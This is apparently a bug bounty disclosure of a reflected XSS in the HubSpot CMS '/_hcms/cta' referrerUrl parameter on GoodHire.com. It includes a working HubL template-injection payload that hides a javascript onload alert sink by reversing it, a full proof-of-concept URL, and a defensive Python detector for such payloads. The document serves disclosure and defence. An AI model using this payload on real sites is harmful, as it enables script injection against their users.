Feb 17, 2019

Reflected XSS in GoodHire.com CMS

Program : inflection
Bug Type : Reflected XSS
Severity : High 
Domain : GoodHire.com
Bounty : $0 + Bonus $150

******************************
Affected Parameter (in HubSpot CMS) : referrerUrl
Affected Path : /_hcms/cta

**********************************
Payload
{%25+macro+field()+%25}moc.okok//:ptth//)niamod.tnemucod(trela:tpircsavaj=daolno+gvshttp://http:""//{%25+endmacro+%25}{{+field(1)%7curlize%7creverse%7curlize%7creverse%7curlize%7creverse+}}


**********************************
PoC was :
https://www.goodhire.com/_hcms/cta?referrerUrl={%25+macro+field()+%25}moc.okok//:ptth//)niamod.tnemucod(trela:tpircsavaj=daolno+gvshttp://http:%22%22//{%25+endmacro+%25}{{+field(1)%7curlize%7creverse%7curlize%7creverse%7curlize%7creverse+}}
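As an added example (not part of the original write-up), a small Python detection heuristic that URL-decodes the referrerUrl value from the PoC above and flags HubL template delimiters and XSS tokens; it also checks the character-reversed value, because the payload writes its sink backwards and relies on the template's reverse filter to undo that. The second, benign URL is a constructed sample.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed samples: the PoC URL from the write-up and one benign request.
SAMPLE_URLS = [
    "https://www.goodhire.com/_hcms/cta?referrerUrl={%25+macro+field()+%25}"
    "moc.okok//:ptth//)niamod.tnemucod(trela:tpircsavaj=daolno+gvshttp://http:%22%22//"
    "{%25+endmacro+%25}{{+field(1)%7curlize%7creverse%7curlize%7creverse%7curlize%7creverse+}}",
    "https://www.goodhire.com/_hcms/cta?referrerUrl=https://www.example.com/pricing",
]

# HubL/Jinja-style delimiters and filters; none of these belong in a referrer URL.
TEMPLATE_MARKERS = re.compile(r"\{%|%\}|\{\{|\}\}|\|\s*(?:reverse|urlize|safe)\b")
# Classic XSS sinks. Matched on the decoded value and on its reversed form,
# since the PoC hides them by spelling the string backwards.
XSS_TOKENS = re.compile(r"javascript:|\bon[a-z]+\s*=|<\s*(?:script|svg|img)\b", re.I)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """URL-decode until the string stops changing (handles %25-style double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(url: str) -> dict:
    """Map each suspicious query parameter to the list of findings raised for it."""
    findings = {}
    query = urlsplit(url).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:
            value = fully_decode(raw)  # parse_qs already decoded once
            hits = set()
            if TEMPLATE_MARKERS.search(value):
                hits.add("template_syntax")
            if XSS_TOKENS.search(value):
                hits.add("xss_token")
            if XSS_TOKENS.search(value[::-1]):
                hits.add("xss_token_reversed")
            if hits:
                findings[name] = sorted(hits)
    return findings


if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(urlsplit(u).path, inspect_request(u) or "clean")
```

Running it flags the PoC's referrerUrl with template_syntax and xss_token_reversed and reports the benign request as clean.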


***********************************
For more about this bug, please visit my write-up






****************************************

Security Researcher at Many Websites - Bug Hunter - Civil Engineer Student
